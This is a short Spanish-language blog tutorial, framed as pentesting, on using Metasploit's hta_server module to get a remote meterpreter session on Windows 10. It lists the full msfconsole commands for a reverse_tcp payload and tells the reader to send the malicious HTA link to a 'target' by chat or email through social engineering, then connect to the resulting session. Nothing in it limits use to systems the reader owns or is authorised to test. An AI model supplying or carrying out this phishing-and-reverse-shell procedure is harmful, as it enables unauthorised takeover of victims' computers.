Hacking Windows Metasploit HTA Server
Hacking Windows Metasploit HTA Server

Pentesting Remoto Windows 10 usando HTA Web Server

Este módulo aloja una HTML Application (HTA) que, cuando se abre, ejecutará una payload  (carga útil) a través de Powershell. Cuando un usuario navega hacia el archivo HTA, Windows te alertará dos veces antes de que se ejecute la carga útil

Nota

Este método, de hace algunos años, desgraciadamente funciona con Windows Defender desactivado. Un usuario (Jesus P. M), a través de la fanpage de FB, me solicitó el tutorial y aquí está. Un saludo Jesus!.

Objetivos de explotación

Tabla de Contenido

Pentesting con HTA Web Server

  • Abre el terminal e inicia el Metasploit Framework (MSF):
msfconsole
Iniciar msfconsole en Parrot OS
Iniciar msfconsole en Parrot OS
  • Creamos la payload con los siguientes comandos:
use exploit/windows/misc/hta_server
set lhost <tu_IP>
set srvhost <tu_IP>
set payload windows/meterpreter/reverse_tcp
set lport 8443
exploit
Crear exploit hta_server
Crear exploit hta_server

Para conocer tu IP abre una nueva terminal y ejecuta el comando ifconfig.

  • Lo hecho anteriormente creará un URL con el archivo infeccioso. Envía el enlace del servidor al objetivo por chat o correo electrónico o cualquier técnica de ingeniería social.
Enviar hta_server por ingeniería social
Enviar hta_server por ingeniería social
  • Cuando el ordenador objetivo navegue hacía tu enlace, descargará un archivo del tipo abcxyz.hta, y cuando el objetivo haga clic en él obtendrás la sesión de meterpreter.
Ejecución de archivo hta en Windows 10
Ejecución de archivo hta en Windows 10
  • Ahora tienes acceso a la PC del objetivo. Utiliza el comando “sessions -i” y el número de sesión para conectarte a la sesión.
Sesión de meterpreter con hta_server
Sesión de meterpreter con hta_server

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda